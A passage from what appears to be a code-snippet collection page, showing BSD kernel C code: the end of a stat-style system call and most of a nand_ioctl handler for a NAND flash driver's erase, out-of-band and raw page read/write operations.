vrele(dvp);
else
vput(dvp);
}
error = vn_stat(vp, &sb);
vput(vp);
if (error)
return (error);
} else {
error = vn_stat(dvp, &sb);
vput(dvp);
if (error) {
vput(vp);
return (error);
}
error = vn_stat(vp, &sb1);
vput(vp);
if (error)
return (error);
sb.st_mode &= ~S_IFDIR;
sb.st_mode |= S_IFLNK;
sb.st_nlink = sb1.st_nlink;
sb.st_size = sb1.st_size;
sb.st_blocks = sb1.st_blocks;
}
cvtstat(&sb, &osb);
error = copyout((void *)&osb, (void *)SCARG(uap, ub), sizeof (osb));
return (error);
}
示例15: nand_ioctl
static int
nand_ioctl(struct cdev *dev, u_long cmd, caddr_t data, int fflag,
struct thread *td)
{
struct nand_chip *chip;
struct chip_geom *cg;
struct nand_oob_rw *oob_rw = NULL;
struct nand_raw_rw *raw_rw = NULL;
device_t nandbus;
size_t bufsize = 0, len = 0;
size_t raw_size;
off_t off;
uint8_t *buf = NULL;
int ret = 0;
uint8_t status;
chip = (struct nand_chip *)dev->si_drv1;
cg = &chip->chip_geom;
nandbus = device_get_parent(chip->dev);
if ((cmd == NAND_IO_RAW_READ) || (cmd == NAND_IO_RAW_PROG)) {
raw_rw = (struct nand_raw_rw *)data;
raw_size = cg->pgs_per_blk * (cg->page_size + cg->oob_size);
/* Check if len is not bigger than chip size */
if (raw_rw->len > raw_size)
return (EFBIG);
/*
* Do not ask for too much memory, in case of large transfers
* read/write in 16-pages chunks
*/
bufsize = 16 * (cg->page_size + cg->oob_size);
if (raw_rw->len < bufsize)
bufsize = raw_rw->len;
buf = malloc(bufsize, M_NAND, M_WAITOK);
len = raw_rw->len;
off = 0;
}
switch(cmd) {
case NAND_IO_ERASE:
ret = nand_erase_blocks(chip, ((off_t *)data)[0],
((off_t *)data)[1]);
break;
case NAND_IO_OOB_READ:
oob_rw = (struct nand_oob_rw *)data;
ret = nand_oob_access(chip, oob_rw->page, 0,
oob_rw->len, oob_rw->data, 0);
break;
case NAND_IO_OOB_PROG:
oob_rw = (struct nand_oob_rw *)data;
ret = nand_oob_access(chip, oob_rw->page, 0,
oob_rw->len, oob_rw->data, 1);
break;
case NAND_IO_GET_STATUS:
NANDBUS_LOCK(nandbus);
ret = NANDBUS_GET_STATUS(nandbus, &status);
if (ret == 0)
*(uint8_t *)data = status;
NANDBUS_UNLOCK(nandbus);
break;
case NAND_IO_RAW_PROG:
while (len > 0) {
if (len < bufsize)
bufsize = len;
ret = copyin(raw_rw->data + off, buf, bufsize);
if (ret)
break;
ret = nand_prog_pages_raw(chip, raw_rw->off + off, buf,
bufsize);
if (ret)
break;
len -= bufsize;
off += bufsize;
}
break;
case NAND_IO_RAW_READ:
while (len > 0) {
if (len < bufsize)
bufsize = len;
ret = nand_read_pages_raw(chip, raw_rw->off + off, buf,
bufsize);
if (ret)
break;
ret = copyout(buf, raw_rw->data + off, bufsize);
if (ret)
break;
len -= bufsize;
off += bufsize;
}
break;
//.........这里部分代码省略.........